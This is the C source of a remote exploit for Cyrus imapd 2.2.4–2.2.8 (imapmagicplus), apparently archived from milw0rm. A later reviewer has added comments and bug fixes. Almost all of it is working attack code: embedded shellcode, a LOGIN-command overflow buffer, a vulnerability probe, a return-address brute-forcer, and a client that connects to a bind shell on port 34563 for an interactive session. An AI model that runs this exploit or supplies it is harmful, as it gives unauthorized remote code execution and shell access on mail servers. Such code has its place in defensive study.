Cyrus imapd 2.2.4 2.2.8 imapmagicplus Remote Exploit

  1    /********************************************************************************************
  2     *                                                                                          *
  3     *                 Cyrus imapd v 2.2.4 − 2.2.8 (imapmagicplus) Remote Exploit               *
  4     *                                   By crash−x / unl0ck                                    *
  5     *                               Bug found by Stefan Esser                                  *
  6     *                           www.unl0ck.org / www.coredumped.info                           *
  7     *                          crash−x@unl0ck.org / crash.ix@gmail.com                         *
  8     *                                                                                          *
  9     * Greets to: all GOTFault ex−member, unl0ck, scozar, eos−india, xesio and all my other     *
  10    *             friends                                                                      *
  11    *                                                                                          *
  12    * Thanks to: n2n                                                                           *
  13    *                                                                                          *
  14    * Why:        This was GOTFault code but Im releasing it with unl0ck. The only reason      *
  15    *             Im releasing it is that somebody leaked it. We didnt want to release any     *
  16    *             GOTFault stuff or give it to anyone besides GOTFault members. But somehow    *
  17    *             stuff got leaked and we had some problems in the team. tal0n disappeared     *
  18    *             and GOTFault doesnt exist anymore.                                           *
  19    *             Im sorry about GOTFault and I hope tal0n has a good time wherever he is and *
  20    *             whatever he is doing.                                                        *
  21    *                                                                                          *
  22    ********************************************************************************************/
  23
  24   #include    <stdio.h>
  25   #include    <stdlib.h>
  26   #include    <stdarg.h>
  27   #include    <string.h>
  28   #include    <sys/types.h>
  29   #include    <sys/socket.h>
  30   #include    <sys/time.h>
  31   #include    <netinet/in.h>
  32   #include    <arpa/inet.h>
  33   #include    <unistd.h>
  34   #include    <netdb.h>
  35
  36   #define RET_BF_START 0x08000000
  37   #define RET_BF_END 0x08600000
  38
  39   #define SHELL_PORT "34563"
  40   #define SHELL_COMMAND "uname −a; id;"
  41
/*
 * Raw machine-code bytes that gen_payload() appends to the request (the
 * attribution comment below credits Metasploit; the bytes themselves are not
 * documented anywhere in this file).  What the rest of the file requires of
 * this array:
 *   - gen_payload() copies strlen(shellcode) bytes, so the array must not
 *     contain a NUL byte or the copy silently truncates;
 *   - it is copied in after check() has run on the payload, so check()'s
 *     byte substitutions are never applied to it;
 *   - get_shell() later connects to SHELL_PORT, so presumably these bytes
 *     open a listener on that port -- NOTE(review): not verifiable here.
 */
char shellcode[] = /* thanks metasploit! */
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x16\x81\x73\x17\xb4\x1e"
"\xc2\x86\x83\xeb\xfc\xe2\xf4\x85\xc5\x35\x65\x04\x78\x91\xc5\xe7"
"\x5d\x91\x0f\x55\x55\x0f\x06\x3d\xd9\x90\xe0\xdc\x99\xc1\xc5\xd2"
"\x4d\x4b\x67\x04\x0e\x92\xd7\xe3\x97\x23\x36\xd2\xd3\x42\x36\xd2"
"\xad\xc6\x4b\x34\x4e\x92\xd1\x3d\xff\x81\x36\xd2\xd3\x42\x0f\x6d"
"\x97\x01\x36\x8b\x57\x0f\x06\xf5\xfc\x3a\xd7\xdc\x70\xed\xf5\xdc"
"\x76\xed\xa9\xd6\x77\x4b\x65\xe5\x4d\x4b\x67\x04\x15\x0f\x06";
  50
  51
/* One known build: a label shown by usage()/main() and the address value
 * (retloc) that gen_payload() stores into the attack buffer.  The table is
 * terminated by an entry whose platform is NULL; usage() and main() walk it
 * until they reach that sentinel. */
struct targ {
    char *platform;
    int retloc;
};

struct targ targets[] = {
    [0] = { .platform = "Debian 3.1 - Cyrus imapd 2.2.8", .retloc = 0x0812893c },
    [1] = { .platform = NULL, .retloc = 0 },
};
  59
  60
/* Print the command-line help and the contents of targets[], then exit(1).
 * `a` is the program name (argv[0]) shown on the usage line.  Never returns. */
void usage(char *a){
    size_t idx;

    printf("[-] Usage: %s -h <host> [options]\n", a);
    fputs("[!] Options:\n"
          "\t\t-h\tHostname which you want attack (required)\n"
          "\t\t-p\tPort of the imapd (default: 143)\n"
          "\t\t-t\tTarget (default: 0)\n", stdout);
    printf("\t\t-S\tBruteforce start address (default: 0x%x)\n"
           "\t\t-E\tBruteforce end address (default: 0x%x)\n",
           RET_BF_START, RET_BF_END);
    fputs("\t\t-P\tPayload size (default: 10000)\n"
          "\t\t-s\tHow long to sleep before try connect to shell (default: 1)\n"
          "\t\t-v\tOnly vulncheck\n"
          "\t\t-V\tNo vulncheck\n"
          "[!] Targets:\n", stdout);
    /* targets[] ends with a NULL platform sentinel. */
    for (idx = 0; targets[idx].platform != NULL; idx++)
        printf("\t\t%zu\t %s\n", idx, targets[idx].platform);
    fputs("\t\t1337\t All Linux Distros (bruteforce)\n", stdout);
    exit(1);
}
  81
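/* Format `s` with the trailing arguments and send the result on `sock`.
 *
 * Returns the number of bytes sent (the whole formatted length, since short
 * sends are retried) or -1 on a formatting, allocation or send() failure.
 *
 * Differences from the vasprintf-based original: the formatting is done with
 * two vsnprintf passes (plain C99), the original's free() of an indeterminate
 * pointer on vasprintf failure is gone, va_end() is reached on every path,
 * and a partial send() no longer silently drops the rest of the buffer. */
int sockprintf(int sock, const char *s, ...){
    va_list arg, arg_copy;
    char *buf;
    int len;
    size_t sent = 0;

    va_start(arg, s);
    va_copy(arg_copy, arg);
    len = vsnprintf(NULL, 0, s, arg);   /* size pass */
    va_end(arg);
    if (len < 0) {
        va_end(arg_copy);
        return -1;
    }
    buf = malloc((size_t)len + 1);
    if (buf == NULL) {
        va_end(arg_copy);
        return -1;
    }
    vsnprintf(buf, (size_t)len + 1, s, arg_copy);   /* fill pass */
    va_end(arg_copy);

    /* send() on a stream socket may transmit fewer bytes than asked for;
     * keep going until everything is out or an error occurs. */
    while (sent < (size_t)len) {
        ssize_t n = send(sock, buf + sent, (size_t)len - sent, 0);
        if (n == -1) {
            free(buf);
            return -1;
        }
        sent += (size_t)n;
    }
    free(buf);
    return len;
}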
  99
  100
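/* Substitute, in place, the bytes the author excludes from the generated
 * request body (gen_payload() calls this on the attack buffer):
 *   0x09 -> 0x08, 0x0a/0x0b/0x0c/0x0d -> 0x0e, 0x20 -> 0x21, 0x22 -> 0x23,
 *   0x28 -> 0x27, 0x29 -> 0x30.  All other bytes are left untouched.
 * `ptr` is a NUL-terminated string; processing stops at the terminator.
 *
 * Same mapping as the original switch.  The original's `case 0` could never
 * match (the loop ends at the terminator) and is dropped; strlen() is now
 * evaluated once, which is safe because no substitution produces a NUL, so
 * the string length cannot change while looping.  A NULL ptr is a no-op. */
void check(char *ptr){
    static const unsigned char map[256] = {
        [0x09] = 0x08,
        [0x0a] = 0x0e, [0x0b] = 0x0e, [0x0c] = 0x0e, [0x0d] = 0x0e,
        [0x20] = 0x21, [0x22] = 0x23,
        [0x28] = 0x27, [0x29] = 0x30,
    };
    size_t len;

    if (ptr == NULL)
        return;
    len = strlen(ptr);
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)ptr[i];
        if (map[c] != 0)
            ptr[i] = (char)map[c];
    }
}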
  139
  140
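/* Fill addr->sin_addr from `hostn`, a dotted-quad or a host name.
 * Dotted quads are parsed locally with inet_aton(); anything else goes
 * through gethostbyname().  Only sin_addr is written -- family and port are
 * set later by conn().
 *
 * Returns 0 on success, -1 (after printing a message) when the name does not
 * resolve to an IPv4 address, or when addr/hostn is NULL.  The original had
 * no return statement on the success path; main() ignores the result, so a
 * caller that wants to know must check it itself. */
int resolv(struct sockaddr_in *addr, char *hostn){
    struct hostent *host;

    if (addr == NULL || hostn == NULL)
        return -1;
    if (inet_aton(hostn, &addr->sin_addr))
        return 0;

    host = gethostbyname(hostn);
    /* h_addr_list[0] replaces the legacy h_addr macro; the family/length
     * checks make sure only an IPv4 address is copied into sin_addr. */
    if (host == NULL || host->h_addrtype != AF_INET
            || host->h_length != (int)sizeof(struct in_addr)
            || host->h_addr_list[0] == NULL) {
        printf("[-] Wasnt able to resolve %s!\n", hostn);
        return -1;
    }
    memcpy(&addr->sin_addr, host->h_addr_list[0], sizeof(struct in_addr));
    return 0;
}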
  153
  154
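/* Open a TCP connection to `addr` (sin_addr already filled in by resolv())
 * on `port`.  `addr` is passed by value, so the port/family set here do not
 * propagate back to the caller.
 *
 * Returns the connected descriptor, or -1 if socket() or connect() fails.
 * On a failed connect() the descriptor is now closed; the original returned
 * -1 and leaked it. */
int conn(struct sockaddr_in addr, int port){
    int sock = socket(PF_INET, SOCK_STREAM, 0);

    if (sock == -1)
        return -1;

    addr.sin_port = htons((unsigned short)port);
    addr.sin_family = AF_INET;

    if (connect(sock, (struct sockaddr *)&addr, sizeof addr) == -1) {
        close(sock);
        return -1;
    }
    return sock;
}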
  170
  171
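/* After `sleeps` seconds, connect to addr:port and relay stdin <-> socket.
 *
 * Returns -1 if the connection cannot be made (main() then carries on).
 * On a closed or failing socket it prints a message and exit(1)s, as the
 * original did; on end-of-file on stdin it closes the socket and exit(0)s
 * instead of spinning in select() as the original would.
 *
 * Fixes relative to the original loop: recv() returning 0 (peer closed) is
 * treated like an error instead of looping forever, stdin data is written
 * using the byte count read() returned rather than strlen() of a buffer that
 * need not be NUL-terminated, socket output is written with fwrite() so
 * embedded NULs do not truncate it, and select() gets sock+1 instead of a
 * fixed 255. */
int get_shell(struct sockaddr_in addr, int port, int sleeps){
    int sock;
    char buffer[1024];
    fd_set fds;

    if (sleeps > 0)
        sleep((unsigned)sleeps);

    if ((sock = conn(addr, port)) == -1)
        return -1;
    /* FD_SET on a descriptor >= FD_SETSIZE is undefined behaviour. */
    if (sock >= FD_SETSIZE) {
        fprintf(stderr, "[-] socket descriptor too large for select()\n");
        close(sock);
        exit(1);
    }
    printf("[+]\n[+] Wooohooo we got a shell!\n");
    sockprintf(sock, SHELL_COMMAND"\r\n");

    for (;;) {
        ssize_t n;

        FD_ZERO(&fds);
        FD_SET(0, &fds);
        FD_SET(sock, &fds);

        if (select(sock + 1, &fds, NULL, NULL, NULL) == -1) {
            fprintf(stderr, "[-] sending failed\n");
            close(sock);
            exit(1);
        }

        if (FD_ISSET(sock, &fds)) {
            n = recv(sock, buffer, sizeof buffer, 0);
            if (n <= 0) {
                fprintf(stderr, "[-] Connection closed by remote host!\n");
                close(sock);
                exit(1);
            }
            fwrite(buffer, 1, (size_t)n, stderr);
        }

        if (FD_ISSET(0, &fds)) {
            n = read(0, buffer, sizeof buffer);
            if (n <= 0) {
                close(sock);
                exit(0);
            }
            if (write(sock, buffer, (size_t)n) != n) {
                fprintf(stderr, "[-] sending failed\n");
                close(sock);
                exit(1);
            }
        }
    }
}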
  211
  212
/* Print one progress line, overwriting the previous one with '\r': a
 * four-frame spinner ("|", "/", "-", "\") followed by the address window
 * currently being tried.  The spinner position persists between calls. */
void status(int retloc, int retloc2, int retaddr){
    static const char *const frames[] = { "[|] ", "[/] ", "[-] ", "[\\] " };
    static unsigned frame = 0;

    fputs(frames[frame], stdout);
    frame = (frame + 1) % 4;
    printf("Trying retlocs [0x%x - 0x%x] retaddr [0x%x]\r", retloc, retloc2, retaddr);
    fflush(stdout);
}
  235
/* Build the request both vulnchck() and main() send:
 *   "L01 LOGIN " + filler + shellcode + " {5}" + NUL, exactly p_size bytes.
 * The buffer is zeroed first, so it is always a NUL-terminated string and the
 * callers send it with "%s".
 *
 * payload - caller-provided buffer of at least p_size bytes.
 * p_size  - total size.  Must cover the fixed writes below (offset 562 plus a
 *           pointer, and strlen(shellcode)+5 bytes at the tail); main()
 *           rejects -P values below 1000 and vulnchck() passes 1024.
 * retloc  - address value stored into the attack buffer (unused in mode 0).
 * mode    - 0: vulncheck buffer, the filler is all 'A'.
 *           1: attack buffer, built by the steps commented below.
 */
void gen_payload(char *payload, int p_size, int retloc, int mode){
    int i;

    memset(payload, 0x0, p_size);
    memcpy(payload, "L01 LOGIN ", strlen("L01 LOGIN "));
    /* mode == 0 is vulncheck buffer and 1 is attack buffer */
    if(mode == 0)
        memset(payload+strlen("L01 LOGIN "), 'A', p_size-strlen("L01 LOGIN "));
    else{
        /* First 90% of the buffer: pointer-sized copies of
         * retloc + p_size - p_size/20, written at a 4-byte stride.
         * NOTE(review): each store is sizeof(void *) bytes wide, so the
         * stride only matches on a 32-bit build; it is also an unaligned,
         * type-punned write. */
        for(i=strlen("L01 LOGIN "); i < (p_size-(p_size/10)); i+=4)
            *((void **)(payload+i)) = (void *)((retloc+(p_size-(p_size/10/2))));
        /* Remaining 10%: 0x90 filler; the shellcode is copied over its tail
         * further down. */
        memset(payload+i, '\x90', p_size-i);
        /* retloc itself goes at fixed offset 562 (the offset is not
         * explained anywhere in this file). */
        *((void **)(payload+562)) = (void *)(retloc);
        /* Temporary terminator so check() stops where " {5}" will start;
         * the memcpy below overwrites it. */
        payload[p_size-5] = '\0';
        /* Byte substitution on the attack body only -- the shellcode is
         * appended afterwards and is therefore never filtered. */
        check(payload + strlen("L01 LOGIN "));
    }
    /* Tail layout: [shellcode][" {5}"][NUL], ending exactly at p_size. */
    memcpy(payload+p_size-strlen(shellcode)-strlen(" {5}")-1, shellcode, strlen(shellcode));
    memcpy(payload+p_size-strlen(" {5}")-1, " {5}", strlen(" {5}"));
    payload[p_size-1] = '\0';
}
  256
/* Send the mode-0 buffer (1024 bytes, 'A' filler) to addr:port and read the
 * verdict from the server's reaction: if recv() returns less than 1 byte
 * (error or connection closed) the server is reported as vulnerable and the
 * function returns; any reply at all is reported as not vulnerable and the
 * process exits with status 1.  A failed connect() also exits with 1.
 * NOTE(review): any peer that simply drops the connection -- a non-IMAP
 * service, a rate limiter, a timeout -- is counted as "vulnerable" here. */
void vulnchck(struct sockaddr_in addr, int port){
    char probe[1024];
    int fd;

    printf("[!] Checking if the server is vuln!\n");
    fd = conn(addr, port);
    if (fd == -1) {
        printf("[-] Connecting failed!\n");
        exit(1);
    }
    gen_payload(probe, sizeof probe, 0x00, 0);
    sockprintf(fd, "%s\r\n", probe);

    if (recv(fd, probe, sizeof probe, 0) >= 1) {
        printf("[-] Server not vuln!\n");
        close(fd);
        exit(1);
    }
    printf("[+] Yeaahaa server is vuln, lets fuck that bitch!\n");
    close(fd);
}
  282
  283
/* Entry point.  Parses options (see usage()), optionally runs vulnchck(),
 * then loops over candidate addresses sending the mode-1 buffer from
 * gen_payload() and, every few attempts, calls get_shell().  Returns 1 on
 * every path unless get_shell() exits the process first.
 *
 * vulncheck is 1 by default (check, then attack), 2 with -v (check only),
 * 0 with -V (skip the check).  target 1337 selects the sweep from
 * ret_bf_start to ret_bf_end; any other index uses targets[target].retloc. */
int main(int argc, char **argv){
    /* NOTE(review): buffer, ptr and fds are declared but never used here. */
    char *payload = NULL, *hostn = NULL, buffer[1024], *ptr;
    int i, first, sock, opt, target = 0, port = 143,
        shell_port = atoi(SHELL_PORT), sleeps = 1,
        p_size=10000, ret_bf_start = RET_BF_START,
        ret_bf_end = RET_BF_END, vulncheck = 1;
    fd_set fds;
    struct sockaddr_in addr;   /* only sin_addr is filled in, by resolv() */

    printf("[!] Cyrus imapd 2.2.4 - 2.2.8 remote exploit by crash-x / unl0ck\n");

    if (argc < 2)
        usage(argv[0]);

    while ((opt = getopt (argc, argv, "h:p:t:s:P:S:E:vV")) != -1){
        switch (opt){
                case 'h':
                     hostn = optarg;
                     break;
                case 'p':
                port = atoi(optarg);
                if(port > 65535 || port < 1){
                     printf("[-] Port %d is invalid\n",port);
                     return 1;
                }
                break;
            case 't':
                target = atoi(optarg);
                /* Count the entries of targets[]; i stops on the NULL sentinel. */
                for(i = 0; targets[i].platform; i++);
                /* NOTE(review): a negative -t value passes this test and is
                 * later used as an index into targets[]. */
                if(target >= i && target != 1337){
                    printf("[-] Wtf are you trying to target?\n");
                    usage(argv[0]);
                }
                break;
            case 'S':
                /* Base 0: decimal, 0x-hex or 0-octal.  A result of 0 --
                 * including unparsable input -- is treated as invalid.
                 * NOTE(review): an unsigned long is stored into an int. */
                ret_bf_start = strtoul(optarg,NULL,0);
                if(!ret_bf_start){
                    printf("[-] Wtf thats not a valid bruteforce start address!\n");
                    usage(argv[0]);
                }
                break;
            case 'E':
                ret_bf_end = strtoul(optarg,NULL,0);
                if(!ret_bf_end){
                    printf("[-] Wtf thats not a valid bruteforce end address!\n");
                    usage(argv[0]);
                }
                break;
            case 's':
                /* Seconds get_shell() waits before connecting. */
                sleeps = atoi(optarg);
                break;
            case 'P':
                p_size = atoi(optarg);
                /* gen_payload() writes at fixed offsets (562 plus a pointer)
                 * and needs room for the shellcode tail; 1000 is the
                 * author's floor. */
                if(p_size < 1000){
                    printf("[-] Its a bad idea to have a payload with less than 1000 bytes :)\n");
                    return 1;
                }
                break;
            case 'v':
                vulncheck = 2;
                break;
            case 'V':
                vulncheck = 0;
                break;
                default:
                usage(argv[0]);
       }
  }

  if(hostn == NULL)
      usage(argv[0]);

  /* payload is initialised to NULL above, so this test is always true.
   * The buffer is never freed; the process ends with it still allocated. */
  if(payload == NULL){
      if(!(payload = malloc(p_size))){
          printf("[-] Wasnt able to allocate space for the payload!\n");
          return 1;
      }
  }

  /* NOTE(review): the return value is ignored, and addr is otherwise
   * uninitialised; on a resolution failure the loop below still runs. */
  resolv(&addr, hostn);

    if(vulncheck == 2){
        vulnchck(addr, port);
        return 1;
    }
    else if(vulncheck == 1)
        vulnchck(addr, port);

    /* A fixed target narrows the sweep to a 5-address window starting at
     * the table's retloc. */
    if(target != 1337){
        ret_bf_start = targets[target].retloc;
        ret_bf_end = targets[target].retloc+5;
        printf ("[!] Targeting %s\n", targets[target].platform);
    } else
        printf("[!] Starting bruteforce attack!\n");

    /* i counts attempts within a cycle; first counts attempts overall and
     * only decides whether a newline precedes "Connecting failed!". */
    for(i = 0, first = 1; ret_bf_start < ret_bf_end; i++, first++){
        if((sock = conn(addr, port)) == -1){
             if(first != 1)
                  printf("\n");
             printf("[-] Connecting failed!\n");
             break;
        }
        /* The address is stepped before every send: by 90% of p_size (the
         * length of gen_payload()'s address-filled region) on the fifth
         * attempt of a cycle, by one otherwise. */
        if(i == 4)
             ret_bf_start += (p_size - (p_size/10));
        else
             ret_bf_start++;
        gen_payload(payload, p_size, ret_bf_start, 1);
        status(ret_bf_start, ret_bf_start + (p_size - (p_size/10)),
                  ret_bf_start + (p_size - (p_size/10/2)));
        sockprintf(sock, "%s\r\n", payload);
        /* After the large step, wait `sleeps` seconds and try the shell
         * port.  i is reset to 0 here and then incremented by the loop
         * header. */
        if(i == 4){
             get_shell(addr, shell_port, sleeps);
             i = 0;
        }
        if(ret_bf_start >= ret_bf_end)
             printf("[-]\n");
        close(sock);
    }
    printf("[-] Exploit failed!\n");
    return 1;
}
  405
  406   // milw0rm.com [2005−03−29]



